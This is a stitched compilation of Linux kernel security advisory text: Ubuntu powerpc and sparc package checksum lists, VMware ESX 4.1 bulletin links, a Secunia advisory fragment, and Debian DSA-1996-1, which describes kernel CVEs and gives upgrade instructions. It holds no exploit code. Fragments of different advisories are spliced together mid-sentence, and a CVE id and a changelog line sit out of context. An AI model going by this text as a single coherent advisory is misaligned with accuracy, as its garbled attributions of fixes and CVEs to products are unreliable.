  Size/MD5:   244884 6e3b48544941fb912632ec3e72f75d46
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   111842 c208f7829fe2331cb03590292a6519ef
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   131602 a18cb667dc6a12fd78bb0f7616d753a2
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    49026 27c6e4882dd3d7c88309267b676bab0d
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    44084 aa8cc92a7839c15e0d11dbc558b00df2
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:     5860 973ec8be52bb9ed84b0c2b2d4b7cf1ec
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:     6500 13724a81b7c88d7188660d901988a03c
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    79120 b5f689f7a6e387a0e079f9ec85cce40f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    85188 4b2a68fb103406ccb45c410d5381e34f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    74324 06ff1269118c456154d24d65946bce77
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    27270 f454018bd3943dc71227ba46911d8490
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:     8540 d0c4f9b72ffb034342822bb68b8a86e0
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:     9814 18a524184d5a59ac1dab8152271f1c48
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    58820 a451cf6138fcb51e4bd6fc1b0d38e06e
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    70150 4410cc82862b61c69625878e363d2202
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    23714 5d6be1d19d09c6cf5fed4ff3fa71714c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    30802 0893cea12a103e06cac5e6be389eb416
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  1557456 52ec927aed080b2cdbcd398417fbf820
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  1509412 93a274a2c3f3ffdbcfb40058149893ce
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    81666 8b4f32d53470f76e606c36961bb8e90c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    88502 5e1810132e7959d4c5320b25ec82003e
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    64566 c3421b045155b85f15bf4d64fd21afc1
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    77180 0b0478d6a608d72b16d5317d384680ad
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   141538 28182e02d3c347e9e6329e08b052a763
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   151356 389d6b85f7f26ef1f532f31e62a27242

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   139454 c579b8d6ed4aabfe2f9c2aa8f61cc5d1
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    70116 10295069e8479b8071603b2b54fac9b3
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    46518 28a9fd5ace498fa6068517c896494b1b
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    93964 2d6930493105d7e756c8cd8887a5bf26
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   588786 f34910fb0c827bf8107aa48d53281d93
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   148426 f5b290c187ccb525119b4424da533845
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    75854 4ffcd1d24140c3e3a6d0e8ea38eec9cc
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:  2901496 b7a5f516f35fb9ffacc08f66f60ae55e
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb
  Size/MD5:   609758 127e1aa436326e294423d5b97bd17e5b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb
  Size/MD5:   608336 33add8d3d34c4150a99ada3451ebc5ea
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb
  Size/MD5: 20522824 3092f6b57534acee434e03637d131074
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb
  Size/MD5: 20228602 576c3449baa167c50ca15d8a5fd82c3b
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_sparc.deb
  Size/MD5:   748058 2e2f636a0096e6773b2fdb0f85e87128
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   266470 aeef718ea107a1ff17215f84e74e0439
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   209178 89ae0797eee8cac103f260e026bb9c8e
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    26266 2f11bf7e5cbd2e46351eaccae55518aa
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   314148 d5e30f9ee6d167788bbc783a31d793aa
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:  1675484 e2ba5dfb836a98b8b0e933fad76e41e2
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   222876 ad0ed5d3850b8d9ce08169df088991d0
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   121968 1df18a6dec07b226f1a891ea09dac292
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    38792 f9bd63d6e511eb460acd5f61859cc924
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   100816 79628331839d7a7d92d034d107b940d7
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:     8930 12af34035ddd9c01859ce9aeceb4756b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:    62910 984b14287e02f3981f22a5d9e1bb1555
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   120978 03ec3927627fdb5d4511bd6adf9f3c2b
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:  1218006 f14f558279cb37cf6906632354ff0b97
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   101514 bd18d8241a9d61f5f3fd5f8c5f794764
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   200332 27958836b007f739dad0e8763c809466
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb
  Size/MD5:   185108 440058c6b48ac7e0d413dcba54e7af36

.

ESXi 4.1


ESXi410-201010401-SG Download link: http://bit.ly/bb3xjV md5sum: 05f1049c7a595481cd682e92fe8d3285 sha1sum: f6993c185f7d1cb971a4ae6e017e0246b8c25a76 http://kb.vmware.com/kb/1027753

ESX 4.1


ESX410-201010001 Download link: http://bit.ly/a3Ffw8 md5sum: ff4435fd3c74764f064e047c6e5e7809 sha1sum: 322981f4dbb9e5913c8f38684369444ff7e265b3 http://kb.vmware.com/kb/1027027

ESX410-201010001 contains the following security bulletins: ESX410-201010401-SG (COS kernel) | http://kb.vmware.com/kb/1027013 ESX410-201010419-SG (Likewise) | http://kb.vmware.com/kb/1027026 ESX410-201010404-SG (NSS) | http://kb.vmware.com/kb/1027016 ESX410-201010409-SG (tar) | http://kb.vmware.com/kb/1027019 ESX410-201010412-SG (Perl) | http://kb.vmware.com/kb/1027022 ESX410-201010413-SG (cpio) | http://kb.vmware.com/kb/1027023 ESX410-201010410-SG (cURL) | http://kb.vmware.com/kb/1027020 ESX410-201010401-SG (vmkernel64, VMX, CIM)| http://kb.vmware.com/kb/1027013 ESX410-201010414-SG (vmware-esx-pam-config)| http://kb.vmware.com/kb/1027024 ESX410-201010402-SG (GnuTLS, NSS, and openSSL)| http://kb.vmware.com/kb/1027014

ESX410-201010001 also contains the following non-security bulletins ESX410-201010405-BG ESX410-201010415-BG

To install an individual bulletin use esxupdate with the -b option. (CVE-2010-0415)

drivers/net/e1000e/netdev.c in the e1000e driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to have an unspecified impact via crafted packets, a related issue to CVE-2009-4537. (CVE-2010-0307)

Aditionally, it was added support for some backlight models used in Samsung laptops and fixes to detect Saitek X52 joysticks. The verification of md5 checksums and GPG signatures is performed automatically for you. executing a 64bit application with a missing ELF interpreter out of a 32bit application and causing a segmentation fault.

PROVIDED AND/OR DISCOVERED BY: Mathias Krause

ORIGINAL ADVISORY: Mathias Krause: http://marc.info/?l=linux-mm&m=126466407724382&w=4

GIT commits: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=221af7f87b97431e3ee21ce4b0e77d5411cf1549 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=05d43ed8a89c159ff641d472f970e3f1baa66318 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=94673e968cbcce07fa78dac4b0ae05d24b5816e1


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-1996-1 security@debian.org http://www.debian.org/security/ dann frazier February 12, 2010 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : privilege escalation/denial of service/sensitive memory leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2009-3939 CVE-2009-4027 CVE-2009-4536 CVE-2009-4538 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0298 CVE-2010-0306 CVE-2010-0307 CVE-2010-0309 CVE-2010-0410 CVE-2010-0415

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, sensitive memory leak or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-3939

Joseph Malicki reported that the dbg_lvl sysfs attribute for the
megaraid_sas device driver had world-writable permissions,
permitting local users to modify logging settings.

CVE-2009-4536 & CVE-2009-4538

Fabian Yamaguchi reported issues in the e1000 and e1000e drivers
for Intel gigabit network adapters which allow remote users to
bypass packet filters using specially crafted ethernet frames.

CVE-2010-0003

Andi Kleen reported a defect which allows local users to gain read
access to memory reachable by the kernel when the
print-fatal-signals option is enabled. This option is disabled by
default.

CVE-2010-0007

Florian Westphal reported a lack of capability checking in the
ebtables netfilter subsystem. If the ebtables module is loaded,
local users can add and modify ebtables rules.

CVE-2010-0291

Al Viro reported several issues with the mmap/mremap system calls
that allow local users to cause a denial of service (system panic)
or obtain elevated privileges.

CVE-2010-0298 & CVE-2010-0306

Gleb Natapov discovered issues in the KVM subsystem where missing
permission checks (CPL/IOPL) permit a user in a guest system to
denial of service a guest (system crash) or gain escalated
privileges with the guest.

CVE-2010-0309

Marcelo Tosatti fixed an issue in the PIT emulation code in the
KVM subsystem that allows privileged users in a guest domain to
cause a denial of service (crash) of the host system.

CVE-2010-0410

 Sebastian Krahmer discovered an issue in the netlink connector
 subsystem that permits local users to allocate large amounts of
 system memory resulting in a denial of service (out of memory).

CVE-2010-0415

Ramon de Carvalho Valle discovered an issue in the sys_move_pages
interface, limited to amd64, ia64 and powerpc64 flavors in Debian.

For the stable distribution (lenny), this problem has been fixed in version 2.6.26-21lenny3.

For the oldstable distribution (etch), these problems, where applicable, will be fixed in updates to linux-2.6 and linux-2.6.24.

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 5.0 (lenny)
 user-mode-linux                         2.6.26-1um-2+21lenny3

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny


Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz Size/MD5 checksum: 7743374 ab69790fa702dc6902a48328ed655e17 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc Size/MD5 checksum: 5778 5a4c27a374c304a0f727a6bc8ca107f3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz Size/MD5 checksum: 7739467 c8cd3620be097861ec74ba95738bf627 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc Size/MD5 checksum: 5778 71b62f2c2ce9bf12c5c8c7b1aead68a2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz Size/MD5 checksum: 7763646 65572787e140a954f0b5cbc00ce52038 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc Size/MD5 checksum: 5778 3de1d44da4b4d993a2662b458bac2141

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb Size/MD5 checksum: 2690888 80c31909190e7ef5a0b888cd985aefdb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb Size/MD5 checksum: 48683206 b0eacf9609bf144218de5826c134b802 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb Size/MD5 checksum: 1772374 969fd31b2eeb9172960519e484b1450c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb Size/MD5 checksum: 4626604 9dc643ca17ca24bb437f7727e41fa9ef http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb Size/MD5 checksum: 109086 d2d99e3343807acfcec613fe2b0faade http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb Size/MD5 checksum: 48679310 626bdb9481a68d788c3af070bd83972a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb Size/MD5 checksum: 1772624 f3978cd4cbae4410fdd01812ca49314d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb Size/MD5 checksum: 124282 3ef6c6a2c133f85b34e86a9060d59d8e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb Size/MD5 checksum: 109244 949b55283cd8b9ed179b0b3451fdcc10 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb Size/MD5 checksum: 4629852 2881e6e3bea4a10f553cfb6359b05a04 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb Size/MD5 checksum: 108954 f965d54958173c8651d5292164546ee6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb Size/MD5 checksum: 4629238 079c11cad4d2427bf43ae65406dfa295 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb Size/MD5 checksum: 124158 d7bb76a2c77dfac430ea437e61a47c65 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb Size/MD5 checksum: 1768622 002384ba86962914e82a90a7b5252d96 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb Size/MD5 checksum: 124518 4940f30671a058397e8e12df185736b9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb Size/MD5 checksum: 2718306 3a5702e13f5771a6c076105a3a574086 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb Size/MD5 checksum: 2684268 6d1015f72a67ceb41f02e8f632a6b377 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb Size/MD5 checksum: 48675436 3714144183dfa64da47107af27c143a8

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 743134 cf4a7865896e9e113e476aca6cc65ed5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 743006 47d0012e0502eb92092776e835e0036b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 28609290 40877622ce1a766e130fc198e67631d5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 366504 60066c18d1053316f39e16ddde67e13a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 108558 db2317ea07ec9ea8ded1fd1e999380b3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 370704 0d938cd26f870cdd1a2ac068ad8738ba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 3545962 30082d9aa5156be7116d9dc1761c5f5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 29184354 7086136bc3f0af19907e504b8a68f0e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 108728 e01aaf461b32767332e50440ca1b8073 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 28489518 e43aa4137aaea8225993cd55219ca6e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 367130 dfc6af330d308a43ed5ba326368eabbc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 28488834 6820b322ef5f3c5a604f95d7757f0e97 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 365698 361caa0394224ff46f8f75587f2d3aff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 367346 2498260a6e3837db87b97a78970740b4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 28472206 4552e0e14143dbc3111e3b353d3804de http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 108574 47e3f313c9ac8f071f74a408b7c93d2f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 370366 60a9815a9a19873c70586dbd32a7dbf0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 29295384 435f89962b985d1de69e425bf304d219 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 371476 de6e1346acc8231c319ec76a607dff2a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 108446 b0040c54aa8a2b657f4d55a02fc50bc8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 3612802 fb5c52064b92d844e3bc663654b4de8a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 108430 5200f39f4bebd0807a179a0812f7c3cc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 28592640 21a58865548deda20521de56bd5362e1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 367038 e905881cf4ec730fac2657f7fb4f664c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 3546082 1bad5ef07ae9042c3df480c675475b5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 29184122 0c80f7b5e1387271ef37420e97da962f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb Size/MD5 checksum: 365834 6cc1189d57ac0006204a26e19e1d2536 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 755446 35d03e320438bced6901f61ad8e111d9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb Size/MD5 checksum: 28472668 bc33990bce302d2a70906deb5d3ae7bb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb Size/MD5 checksum: 108704 134d95bbe8c49b00d91ebb96e864e0ce

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 108706 255f99a00d2d7d1241aeb55cb4941607 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 19275592 452896220df1ef20183ce97e5897590d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 3777462 bc1448c45ba29a99605dc4caf03591cf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 3721884 d145b6140e015b3ec6149a73d8ab0fb7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 751486 8e754d45a468cbd949d02e21b8f10b3c http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 108686 ca630ca6d3e5743197878761a6e32386 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 3854084 bbac30d36345039e9036fb372d7ffdd0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 390288 fcfc06d7a3e5e9ed3e68396ac6fdd46a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 386658 a82ce6a325c10a22361e10c32171ab8e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 387216 f0e564f52e143b68183373485062b036 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 108578 6f0c584a51282de966fb3f680535edbc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 3777410 a97413b19da80972bfc433cd1782149c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb Size/MD5 checksum: 751526 3103db650456c14a768e4a1dbcd65a82 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb Size/MD5 checksum: 1807168 892c524cbc3014e4c6d136af79b51ad0 